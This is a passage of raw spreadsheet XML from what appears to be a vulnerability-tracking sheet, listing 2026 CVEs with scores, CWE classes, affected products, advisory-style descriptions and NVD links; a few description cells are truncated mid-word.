      <c r="J2528" s="5" t="inlineStr"/>
      <c r="K2528" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L2528" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in Menulux Software Inc. Menulux Portal allows Account Footprinting.
This issue affects Menulux Portal: before 20260903211448.</t>
        </is>
      </c>
      <c r="M2528" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19080</t>
        </is>
      </c>
    </row>
    <row r="2529">
      <c r="A2529" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2529" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19205</t>
        </is>
      </c>
      <c r="C2529" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2529" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2529" s="5" t="inlineStr"/>
      <c r="F2529" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2529" s="5" t="inlineStr"/>
      <c r="H2529" s="5" t="inlineStr"/>
      <c r="I2529" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2529" s="5" t="inlineStr"/>
      <c r="K2529" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L2529" s="5" t="inlineStr">
        <is>
          <t>Observable response discrepancy vulnerability in GastroMenum GastroMenum Web Panel allows Account Footprinting.
This issue affects GastroMenum Web Panel: before 31.08.2026.</t>
        </is>
      </c>
      <c r="M2529" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19205</t>
        </is>
      </c>
    </row>
    <row r="2530">
      <c r="A2530" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2530" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19300</t>
        </is>
      </c>
      <c r="C2530" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2530" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2530" s="5" t="inlineStr"/>
      <c r="F2530" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2530" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2530" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2530" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2530" s="5" t="inlineStr"/>
      <c r="K2530" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2530" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to incomplete scrubbing of sensitive credential fields.</t>
        </is>
      </c>
      <c r="M2530" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19300</t>
        </is>
      </c>
    </row>
    <row r="2531">
      <c r="A2531" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2531" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19305</t>
        </is>
      </c>
      <c r="C2531" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2531" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2531" s="5" t="inlineStr"/>
      <c r="F2531" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2531" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows, ibm</t>
        </is>
      </c>
      <c r="H2531" s="5" t="inlineStr">
        <is>
          <t>apple:macos, langflow:langflow, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="I2531" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2531" s="5" t="inlineStr"/>
      <c r="K2531" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L2531" s="5" t="inlineStr">
        <is>
          <t>IBM Langflow OSS 1.0.0 through 1.11.2 could allow a remote attacker to obtain sensitive information due to server-side request forgery.</t>
        </is>
      </c>
      <c r="M2531" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19305</t>
        </is>
      </c>
    </row>
    <row r="2532">
      <c r="A2532" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2532" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19436</t>
        </is>
      </c>
      <c r="C2532" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2532" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2532" s="5" t="inlineStr"/>
      <c r="F2532" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2532" s="5" t="inlineStr"/>
      <c r="H2532" s="5" t="inlineStr"/>
      <c r="I2532" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2532" s="5" t="inlineStr"/>
      <c r="K2532" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="L2532" s="5" t="inlineStr">
        <is>
          <t>The Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 does not reconcile the value of the gift card coupon it issues against the amount actually collected at checkout, allowing unauthenticated users to obtain store credit worth more than they paid.</t>
        </is>
      </c>
      <c r="M2532" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19436</t>
        </is>
      </c>
    </row>
    <row r="2533">
      <c r="A2533" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2533" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19439</t>
        </is>
      </c>
      <c r="C2533" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2533" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2533" s="5" t="inlineStr"/>
      <c r="F2533" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G2533" s="5" t="inlineStr"/>
      <c r="H2533" s="5" t="inlineStr"/>
      <c r="I2533" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J2533" s="5" t="inlineStr"/>
      <c r="K2533" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2533" s="5" t="inlineStr">
        <is>
          <t>The Ultimate Gift Cards for WooCommerce WordPress plugin before 3.2.10 does not have any authorisation check when displaying gift card details, allowing unauthenticated users to retrieve the gift cards attached to arbitrary orders and disclose customer personal data, balances, dates and, in 3.2.9, the live redemption code, which anyone holding it can spend.
Versions from 3.0.3 to 3.2.8 disclose the same data without the redemption code.</t>
        </is>
      </c>
      <c r="M2533" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19439</t>
        </is>
      </c>
    </row>
    <row r="2534">
      <c r="A2534" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2534" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19534</t>
        </is>
      </c>
      <c r="C2534" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2534" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2534" s="5" t="inlineStr"/>
      <c r="F2534" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2534" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2534" s="5" t="inlineStr"/>
      <c r="I2534" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J2534" s="5" t="inlineStr"/>
      <c r="K2534" s="5" t="inlineStr">
        <is>
          <t>CWE-248, CWE-252</t>
        </is>
      </c>
      <c r="L2534" s="5" t="inlineStr">
        <is>
          <t>undici's WebSocket client crashes the whole Node.js process during the opening handshake when a server responds with a subprotocol that the client never requested. A default WebSocket connection sends no subprotocol, but if the server's 101 response includes a Sec-WebSocket-Protocol header, undici dereferences a null value while checking it against the requested list and throws an uncaught TypeError. Because that code runs inside a microtask with no surrounding error handling, the exception propagates and terminates the process under Node's default behavior, instead of gracefully failing the connection as required by the WebSocket protocol. Any application that opens a WebSocket to an attacker-controlled or compromised server, or over a plaintext connection subject to a machine-in-the-middle, can be crashed remotely without authentication in the default configuration. This affects undici versions from 6.7.0 up to 6.28.1, from 7.0.0 up to 7.29.1, and from 8.0.0 up to 8.10.2. Users should upgrade to undici 6.28.1, 7.29.1, or 8.10.2.</t>
        </is>
      </c>
      <c r="M2534" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19534</t>
        </is>
      </c>
    </row>
    <row r="2535">
      <c r="A2535" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2535" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19654</t>
        </is>
      </c>
      <c r="C2535" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2535" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2535" s="5" t="inlineStr"/>
      <c r="F2535" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G2535" s="5" t="inlineStr"/>
      <c r="H2535" s="5" t="inlineStr">
        <is>
          <t>redhat:enterprise_linux, rsyslog:rsyslog</t>
        </is>
      </c>
      <c r="I2535" s="5" t="inlineStr">
        <is>
          <t>2026-08-12</t>
        </is>
      </c>
      <c r="J2535" s="5" t="inlineStr"/>
      <c r="K2535" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L2535" s="5" t="inlineStr">
        <is>
          <t>A unauthenticated remote peer may lead rsyslogd to crash due to a flaw in the optional imptcp module. A crafted input sequence during oversize-frame recovery can cause an invalid internal message length and terminate rsyslogd. No confidentiality or integrity impact, privilege escalation, or code execution has been identified. imtcp and the default imptcp framing modes are not affected.</t>
        </is>
      </c>
      <c r="M2535" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19654</t>
        </is>
      </c>
    </row>
    <row r="2536">
      <c r="A2536" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2536" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19858</t>
        </is>
      </c>
      <c r="C2536" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2536" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2536" s="5" t="inlineStr"/>
      <c r="F2536" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2536" s="5" t="inlineStr"/>
      <c r="H2536" s="5" t="inlineStr"/>
      <c r="I2536" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J2536" s="5" t="inlineStr"/>
      <c r="K2536" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L2536" s="5" t="inlineStr">
        <is>
          <t>The JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 does not perform authorisation checks when resolving request-derived data during page rendering, allowing unauthenticated users to read arbitrary user, post and term properties and metadata, including password hashes, private and draft content, and secrets other JetFormBuilder — Dynamic Blocks Form Builder WordPress plugin before 3.6.5.2 store in metadata.</t>
        </is>
      </c>
      <c r="M2536" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19858</t>
        </is>
      </c>
    </row>
    <row r="2537">
      <c r="A2537" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2537" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21728</t>
        </is>
      </c>
      <c r="C2537" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2537" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2537" s="5" t="inlineStr"/>
      <c r="F2537" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2537" s="5" t="inlineStr"/>
      <c r="H2537" s="5" t="inlineStr">
        <is>
          <t>grafana:tempo</t>
        </is>
      </c>
      <c r="I2537" s="5" t="inlineStr">
        <is>
          <t>2026-04-24</t>
        </is>
      </c>
      <c r="J2537" s="5" t="inlineStr"/>
      <c r="K2537" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-770</t>
        </is>
      </c>
      <c r="L2537" s="5" t="inlineStr">
        <is>
          <t>Tempo queries with large limits can cause large memory allocations which can impact the availability of the service, depending on its deployment strategy.
Mitigation can be done by setting max_result_limit in the search config, e.g. to 262144 (2^18). Alternatively, automatically restart the service.</t>
        </is>
      </c>
      <c r="M2537" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21728</t>
        </is>
      </c>
    </row>
    <row r="2538">
      <c r="A2538" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2538" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-22591</t>
        </is>
      </c>
      <c r="C2538" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2538" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2538" s="5" t="inlineStr"/>
      <c r="F2538" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2538" s="5" t="inlineStr"/>
      <c r="H2538" s="5" t="inlineStr"/>
      <c r="I2538" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J2538" s="5" t="inlineStr"/>
      <c r="K2538" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-674</t>
        </is>
      </c>
      <c r="L2538" s="5" t="inlineStr">
        <is>
          <t>eprosima Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group). Prior to versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3, Fast DDS’s implementation of SQL‑based content filtering (DDSSQLFilter) allows any participant in a DDS domain to remotely crash other Fast DDS participants by sending a single crafted SEDP `DATA` submessage whose `PID_CONTENT_FILTER_PROPERTY.filterExpression` contains a deeply nested filter expression. Versions 2.6.12, 2.14.6, 3.2.4, and 3.4.3 fix the issue.</t>
        </is>
      </c>
      <c r="M2538" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-22591</t>
        </is>
      </c>
    </row>
    <row r="2539">
      <c r="A2539" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2539" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-23490</t>
        </is>
      </c>
      <c r="C2539" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2539" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2539" s="5" t="inlineStr"/>
      <c r="F2539" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2539" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H2539" s="5" t="inlineStr">
        <is>
          <t>debian:debian_linux, pyasn1:pyasn1</t>
        </is>
      </c>
      <c r="I2539" s="5" t="inlineStr">
        <is>
          <t>2026-01-16</t>
        </is>
      </c>
      <c r="J2539" s="5" t="inlineStr"/>
      <c r="K2539" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L2539" s="5" t="inlineStr">
        <is>
          <t>pyasn1 is a generic ASN.1 library for Python. Prior to 0.6.2, a Denial-of-Service issue has been found that leads to memory exhaustion from malformed RELATIVE-OID with excessive continuation octets. This vulnerability is fixed in 0.6.2.</t>
        </is>
      </c>
      <c r="M2539" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-23490</t>
        </is>
      </c>
    </row>
    <row r="2540">
      <c r="A2540" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2540" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-24301</t>
        </is>
      </c>
      <c r="C2540" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2540" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2540" s="5" t="inlineStr"/>
      <c r="F2540" s="5" t="n">
        <v>0.022</v>
      </c>
      <c r="G2540" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H2540" s="5" t="inlineStr">
        <is>
          <t>microsoft:copilot</t>
        </is>
      </c>
      <c r="I2540" s="5" t="inlineStr">
        <is>
          <t>2026-08-18</t>
        </is>
      </c>
      <c r="J2540" s="5" t="inlineStr"/>
      <c r="K2540" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="L2540" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a command ('command injection') in Microsoft Copilot allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M2540" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-24301</t>
        </is>
      </c>
    </row>
    <row r="2541">
      <c r="A2541" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2541" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25639</t>
        </is>
      </c>
      <c r="C2541" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2541" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2541" s="5" t="inlineStr"/>
      <c r="F2541" s="5" t="n">
        <v>0.028</v>
      </c>
      <c r="G2541" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H2541" s="5" t="inlineStr">
        <is>
          <t>axios:axios</t>
        </is>
      </c>
      <c r="I2541" s="5" t="inlineStr">
        <is>
          <t>2026-02-09</t>
        </is>
      </c>
      <c r="J2541" s="5" t="inlineStr"/>
      <c r="K2541" s="5" t="inlineStr">
        <is>
          <t>CWE-1287, CWE-754</t>
        </is>
      </c>
      <c r="L2541" s="5" t="inlineStr">
        <is>
          <t>Axios is a promise based HTTP client for the browser and Node.js. Prior to versions 0.30.3 and 1.13.5, the mergeConfig function in axios crashes with a TypeError when processing configuration objects containing __proto__ as an own property. An attacker can trigger this by providing a malicious configuration object created via JSON.parse(), causing complete denial of service. This vulnerability is fixed in versions 0.30.3 and 1.13.5.</t>
        </is>
      </c>
      <c r="M2541" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25639</t>
        </is>
      </c>
    </row>
    <row r="2542">
      <c r="A2542" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2542" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-25679</t>
        </is>
      </c>
      <c r="C2542" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2542" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2542" s="5" t="inlineStr"/>
      <c r="F2542" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G2542" s="5" t="inlineStr"/>
      <c r="H2542" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2542" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2542" s="5" t="inlineStr"/>
      <c r="K2542" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-425</t>
        </is>
      </c>
      <c r="L2542" s="5" t="inlineStr">
        <is>
          <t>url.Parse insufficiently validated the host/authority component and accepted some invalid URLs.</t>
        </is>
      </c>
      <c r="M2542" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-25679</t>
        </is>
      </c>
    </row>
    <row r="2543">
      <c r="A2543" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2543" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26278</t>
        </is>
      </c>
      <c r="C2543" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2543" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2543" s="5" t="inlineStr"/>
      <c r="F2543" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G2543" s="5" t="inlineStr"/>
      <c r="H2543" s="5" t="inlineStr">
        <is>
          <t>naturalintelligence:fast-xml-parser</t>
        </is>
      </c>
      <c r="I2543" s="5" t="inlineStr">
        <is>
          <t>2026-02-19</t>
        </is>
      </c>
      <c r="J2543" s="5" t="inlineStr"/>
      <c r="K2543" s="5" t="inlineStr">
        <is>
          <t>CWE-776</t>
        </is>
      </c>
      <c r="L2543" s="5" t="inlineStr">
        <is>
          <t>fast-xml-p</t>
        </is>
      </c>
      <c r="M2543" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26278</t>
        </is>
      </c>
    </row>
    <row r="2544">
      <c r="A2544" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2544" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-26456</t>
        </is>
      </c>
      <c r="C2544" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2544" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2544" s="5" t="inlineStr"/>
      <c r="F2544" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2544" s="5" t="inlineStr">
        <is>
          <t>f5</t>
        </is>
      </c>
      <c r="H2544" s="5" t="inlineStr"/>
      <c r="I2544" s="5" t="inlineStr">
        <is>
          <t>2026-08-27</t>
        </is>
      </c>
      <c r="J2544" s="5" t="inlineStr"/>
      <c r="K2544" s="5" t="inlineStr">
        <is>
          <t>CWE-362, CWE-476</t>
        </is>
      </c>
      <c r="L2544" s="5" t="inlineStr">
        <is>
          <t>A null pointer dereference vulnerability exists in the server-side session management logic of ccoap 77f55c4b466e99327c24ace8a2913d3ba7e2ccd5. The issue is caused by a race condition between the request dispatch thread and the session cleanup thread when accessing shared session list nodes without proper synchronization.</t>
        </is>
      </c>
      <c r="M2544" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-26456</t>
        </is>
      </c>
    </row>
    <row r="2545">
      <c r="A2545" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2545" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27137</t>
        </is>
      </c>
      <c r="C2545" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2545" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2545" s="5" t="inlineStr"/>
      <c r="F2545" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2545" s="5" t="inlineStr"/>
      <c r="H2545" s="5" t="inlineStr">
        <is>
          <t>golang:go</t>
        </is>
      </c>
      <c r="I2545" s="5" t="inlineStr">
        <is>
          <t>2026-03-06</t>
        </is>
      </c>
      <c r="J2545" s="5" t="inlineStr"/>
      <c r="K2545" s="5" t="inlineStr">
        <is>
          <t>CWE-295</t>
        </is>
      </c>
      <c r="L2545" s="5" t="inlineStr">
        <is>
          <t>When verifying a certificate chain which contains a certificate containing multiple email address constraints which share common local portions but different domain portions, these constraints will not be properly applied, and only the last constraint will be considered.</t>
        </is>
      </c>
      <c r="M2545" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27137</t>
        </is>
      </c>
    </row>
    <row r="2546">
      <c r="A2546" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2546" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27462</t>
        </is>
      </c>
      <c r="C2546" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2546" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2546" s="5" t="inlineStr"/>
      <c r="F2546" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2546" s="5" t="inlineStr"/>
      <c r="H2546" s="5" t="inlineStr"/>
      <c r="I2546" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2546" s="5" t="inlineStr"/>
      <c r="K2546" s="5" t="inlineStr">
        <is>
          <t>CWE-204</t>
        </is>
      </c>
      <c r="L2546" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, iTop returns different responses for valid/invalid usernames depending on multiple factors in the reset password mechanism, leading to user enumeration. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2546" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27462</t>
        </is>
      </c>
    </row>
    <row r="2547">
      <c r="A2547" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2547" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27490</t>
        </is>
      </c>
      <c r="C2547" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2547" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2547" s="5" t="inlineStr"/>
      <c r="F2547" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G2547" s="5" t="inlineStr"/>
      <c r="H2547" s="5" t="inlineStr"/>
      <c r="I2547" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J2547" s="5" t="inlineStr"/>
      <c r="K2547" s="5" t="inlineStr">
        <is>
          <t>CWE-330, CWE-331</t>
        </is>
      </c>
      <c r="L2547" s="5" t="inlineStr">
        <is>
          <t>Combodo iTop is a web based IT service management tool. Prior to 3.2.3, inline images that are accessible without being authenticated are protected by a weak 24-bit pseudo-random secret. This issue has been fixed in version 3.2.3.</t>
        </is>
      </c>
      <c r="M2547" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27490</t>
        </is>
      </c>
    </row>
    <row r="2548">
      <c r="A2548" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2548" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-27889</t>
        </is>
      </c>
      <c r="C2548" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2548" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2548" s="5" t="inlineStr"/>
      <c r="F2548" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2548" s="5" t="inlineStr"/>
      <c r="H2548" s="5" t="inlineStr">
        <is>
          <t>linuxfoundation:nats-server</t>
        </is>
      </c>
      <c r="I2548" s="5" t="inlineStr">
        <is>
          <t>2026-03-25</t>
        </is>
      </c>
      <c r="J2548" s="5" t="inlineStr"/>
      <c r="K2548" s="5" t="inlineStr">
        <is>
          <t>CWE-1286, CWE-190</t>
        </is>
      </c>
      <c r="L2548" s="5" t="inlineStr">
        <is>
          <t>NATS-Serve</t>
        </is>
      </c>
      <c r="M2548" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-27889</t>
        </is>
      </c>
    </row>
    <row r="2549">
      <c r="A2549" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2549" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28604</t>
        </is>
      </c>
      <c r="C2549" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2549" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2549" s="5" t="inlineStr"/>
      <c r="F2549" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G2549" s="5" t="inlineStr"/>
      <c r="H2549" s="5" t="inlineStr"/>
      <c r="I2549" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J2549" s="5" t="inlineStr"/>
      <c r="K2549" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="L2549" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible use after free due to a race condition. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="M2549" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28604</t>
        </is>
      </c>
    </row>
    <row r="2550">
      <c r="A2550" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B2550" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-29074</t>
        </is>
      </c>
      <c r="C2550" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D2550" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E2550" s="5" t="inlineStr"/>
      <c r="F2550" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G2550" s="5" t="inlineStr">
        <is>
          <t>java, node.js</t>
        </is>
      </c>
      <c r="H2550" s="5" t="inlineStr">
        <is>
          <t>svgo:svgo</t>
        </is>
      </c>
